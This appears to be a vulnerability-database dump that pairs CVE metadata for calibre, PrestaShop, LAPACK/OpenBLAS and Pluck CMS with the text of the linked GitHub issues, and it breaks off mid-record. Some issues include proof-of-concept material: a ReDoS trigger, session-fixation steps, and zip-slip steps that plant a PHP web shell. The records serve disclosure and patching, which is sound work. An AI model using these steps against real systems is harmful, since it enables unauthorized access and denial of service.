"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.launchpad.net/calibre/+bug/1951979"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/18"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W7QKFPYJ23KG6WJ5NIYAM4N2NWZCLQGL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.launchpad.net/calibre/+bug/1951979"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W7QKFPYJ23KG6WJ5NIYAM4N2NWZCLQGL/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9318CDD6-0832-47C8-A748-63753C21CEE9",
"versionEndExcluding": "5.32.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/dwisiswant0/advisory/issues/18 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"dwisiswant0",
"advisory"
] | ## Description
calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
**CVE ID**: CVE-2021-44686
## Proof of Concept
Vulnerable code: https://github.com/kovidgoyal/calibre/blob/39a22268b930f0d0cf51a42b556982da5f3dbf4d/src/calibre/ebooks/conversion/preprocess.py#L383
To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below.
```python
import re
reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
reg.match('<head>' + '\n' * 1337)
```
## Impact
This issue may lead to a denial of service.
## References
- https://bugs.launchpad.net/calibre/+bug/1951979
- https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0 | ReDoS in calibre | https://api.github.com/repos/dwisiswant0/advisory/issues/18/comments | 1 | 2021-11-23T15:34:30Z | 2021-12-06T23:39:04Z | https://github.com/dwisiswant0/advisory/issues/18 | 1,061,426,157 | 18 | 2,843 |
CVE-2021-43789 | 2021-12-07T17:15:10.027 | PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/issues/26623"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-6xxj-gcjq-wgf4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/issues/26623"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-6xxj-gcjq-wgf4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*",
"matchCriteriaId": "247D35ED-46EB-43B9-91FB-1849EDC3B152",
"versionEndExcluding": "1.7.8.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.7.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/PrestaShop/PrestaShop/issues/26623 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PrestaShop",
"PrestaShop"
] | This issue tracks the status of the PrestaShop 1.7.8.2 release
### Information
Q | A
-----------------------|---------------
**Type** | Patch version
**Build date** | 2021-12-02
**Milestone** | https://github.com/PrestaShop/PrestaShop/milestone/78
**Kanban** | https://github.com/PrestaShop/PrestaShop/projects/21
**Delivery date** | 2021-12-02
### Current status
- [x] Development
- [x] Build
- [x] QA validation
- [x] Release
- [x] Available for upgrade
- [x] Docker image | Release 1.7.8.2 | https://api.github.com/repos/PrestaShop/PrestaShop/issues/26623/comments | 2 | 2021-11-16T09:29:09Z | 2021-12-07T16:04:04Z | https://github.com/PrestaShop/PrestaShop/issues/26623 | 1,054,647,748 | 26,623 | 2,844 |
CVE-2021-4048 | 2021-12-08T22:15:10.220 | An out-of-bounds read flaw was found in the CLARRV, DLARRV, SLARRV, and ZLARRV functions in lapack through version 3.10.0, as also used in OpenBLAS before version 0.3.18. Specially crafted inputs passed to these functions could cause an application using lapack to crash or possibly disclose portions of its memory. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/JuliaLang/julia/issues/42415"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Reference-LAPACK/lapack/commit/38f3eeee3108b18158409ca2a100e6fe03754781"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Reference-LAPACK/lapack/pull/625"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/2be5ee3cca97a597f2ee2118808a2d5eacea050c"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/337b65133df174796794871b3988cd03426e6d41"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/ddb0ff5353637bb5f5ad060c9620e334c143e3d7"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/fe497efa0510466fd93578aaf9da1ad8ed4edbe7"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QFEVOCUG2UXMVMFMTU4ONJVDEHY2LW2/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DROZM4M2QRKSD6FBO4BHSV2QMIRJQPHT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/JuliaLang/julia/issues/42415"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Reference-LAPACK/lapack/commit/38f3eeee3108b18158409ca2a100e6fe03754781"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Reference-LAPACK/lapack/pull/625"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/2be5ee3cca97a597f2ee2118808a2d5eacea050c"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/337b65133df174796794871b3988cd03426e6d41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/ddb0ff5353637bb5f5ad060c9620e334c143e3d7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xianyi/OpenBLAS/commit/fe497efa0510466fd93578aaf9da1ad8ed4edbe7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QFEVOCUG2UXMVMFMTU4ONJVDEHY2LW2/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DROZM4M2QRKSD6FBO4BHSV2QMIRJQPHT/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lapack_project:lapack:*:*:*:*:*:*:*:*",
"matchCriteriaId": "860F1070-052A-491D-AF07-7179ABFF53DA",
"versionEndExcluding": null,
"versionEndIncluding": "3.10.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openblas_project:openblas:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C8DAA17-150E-4182-ADD1-4317FD35ED9D",
"versionEndExcluding": "0.3.18",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:julialang:julia:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50A99E6E-EE4D-443C-AEB3-C141F6CF2266",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "24F54DC9-8AC4-4578-B9B2-ECED81AA515B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "FA4C5004-D212-444C-82B5-2A4B013E0442",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "C3B59E6B-37B8-461B-9701-1FD3CCC15014",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta4:*:*:*:*:*:*",
"matchCriteriaId": "DF1A3614-9C2C-4604-BC11-046866C656EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:julialang:julia:1.7.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "2AD33935-9843-4F09-B5D9-A6C3D86E1022",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:ceph_storage:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D07DF15E-FE6B-4DAF-99BB-2147CF7D7EEA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:ceph_storage:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "516F4E8E-ED2F-4282-9DAB-D8B378F61258",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:ceph_storage:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6E54096-5D45-4CB2-AC9A-DDB55BF2B94C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:ceph_storage:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4E37E1B3-6F68-4502-85D6-68333643BDFF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_storage:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB187A4-F3A6-4993-AEF2-7808F1485EE2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_data_foundation:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0E2C021C-A9F0-4EB4-ADED-81D8B57B4563",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/JuliaLang/julia/issues/42415 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"JuliaLang",
"julia"
] | @DilumAluthge alerted us to segfaults that were occurring on some machines during CI builds while running the LinearAlgebra/tridiag test. Using rr, we were able to trace these segfaults back to a call to `stegr!` in lapack.jl https://github.com/JuliaLang/julia/blob/44d484222005580432433b7889c4a56d25c0ea67/stdlib/LinearAlgebra/src/lapack.jl#L3827
While we ran out of time to fully debug and fix this, we have a MWE that replicates the problem on AMD machines.
Here's the MWE:
```
using LinearAlgebra
dv = Float32[-0.854084671, 1.2590245, -1.31365335, 0.7283687, -0.87726289, 2.06376457, 1.65424788,
-0.640322149, -0.925165355, -0.857617259, -0.192993864, -0.79191643]
ev = Float32[0.215433806, 0.260803878, -1.3471483, -0.799203992, 1.31649506, 0.0412902869,
-0.639533341, 0.039149601, 0.485840291, 1.54775488, -0.503408968, 0]
LAPACK.stegr!('V', 'V', copy(dv), copy(ev), 0.0f0, 1.0f0, 0, 0)
```
CC: @Keno | stegr! call segfault | https://api.github.com/repos/JuliaLang/LinearAlgebra.jl/issues/873/comments | 11 | 2021-09-28T18:29:48Z | 2024-11-26T11:40:36Z | https://github.com/JuliaLang/LinearAlgebra.jl/issues/873 | 2,694,366,540 | 873 | 2,845 |
CVE-2021-31745 | 2021-12-10T18:15:07.463 | Session Fixation vulnerability in login.php in Pluck-CMS Pluck 4.7.15 allows an attacker to sustain unauthorized access to the platform. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/99"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/99"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*",
"matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"384"
] | 384 | https://github.com/pluck-cms/pluck/issues/99 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | **Issue Summary**
A session-fixation vulnerability exists within Pluck's administrative login system which can be abused to retain a valid login session even after an administrator has changed their password.
**Detailed Description**
It is possible to arbitrarily set the session ID of Pluck's "PHPSESSID" cookie. This cookie is used for maintaining administrative login sessions. This can be used in a session-fixation attack, for example, to sustain unauthorized access to the CMS after already gaining it through a primary vulnerability. Furthermore, Pluck does not expire sessions in a timely manner nor are sessions bound in any other way. This also allows an easier brute force attack, as it is possible to brute-force session IDs without rate-limits imposed by the normal login process.
<img width="1633" alt="sessfix" src="https://user-images.githubusercontent.com/2632588/115493762-3579f800-a219-11eb-8f34-6dc7071fa85e.png">
**Reproduction Steps**
1. From Google Chrome, open the developer tools menu, navigate to: Application > Storage -> Cookies -> <PLUCK_DOMAIN>
2. Change the value of the "PHPSESSID" cookkie to an arbitrary value, such as "wolf".
3. Login to the pluck administrative panel, by visiting <PLUCK_DOMAIN>/login.php and login to the panel.
4. On a new browser, repeat steps 1 and 2.
5. On step 3, you will be given access without being prompted for administrative credentials.
**Impact**
After any primary exploit has occurred, the session fixation attack can be used in order to sustained unauthorized access. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password. | Pluck 4.7.15 - Session Fixation Vulnerability | https://api.github.com/repos/pluck-cms/pluck/issues/99/comments | 4 | 2021-04-21T03:45:08Z | 2021-04-30T23:32:01Z | https://github.com/pluck-cms/pluck/issues/99 | 863,419,795 | 99 | 2,847 |
CVE-2021-31746 | 2021-12-10T18:15:07.653 | Zip Slip vulnerability in Pluck-CMS Pluck 4.7.15 allows an attacker to upload specially crafted zip files, resulting in directory traversal and potentially arbitrary code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/100"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/100"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*",
"matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/pluck-cms/pluck/issues/100 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | **Issue Summary**
Pluck's module and theme installers are vulnerable to directory traversal (via zip slip).
**Detailed Description**
It is possible to upload a malicious zip file in order to traverse directories outside of the intended environment, potentially allowing arbitrary code execution which will run with the permissions of the user assigned to the webserver.
**Reproduction Steps**
1. Using the [evilarc tool](https://github.com/ptoomey3/evilarc), create a zip archive containing a PHP file with a depth of 2 `(python evilarch.py shell.php -d 2 -f wolf.zip)`
2. Visit `<pluck_domain>/admin.php?action=themeinstall `and upload the malicious `wolf.zip` you created.
3. Visit `<pluck_domain>/shell.php` and you now have a PHP shell.
**Impact**
This vulnerability makes remote code execution under the privileges of the user running the webserver application possible. | Pluck 4.7.15 - Zip Slip Vulnerability | https://api.github.com/repos/pluck-cms/pluck/issues/100/comments | 2 | 2021-04-21T04:09:29Z | 2021-04-26T18:17:23Z | https://github.com/pluck-cms/pluck/issues/100 | 863,429,744 | 100 | 2,848 |
CVE-2021-27984 | 2021-12-10T19:15:07.783 | In Pluck-4.7.15 admin background a remote command execution vulnerability exists when uploading files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/98"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/98"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*",
"matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/pluck-cms/pluck/issues/98 | [
"Exploit",
"Third Party Advisory"
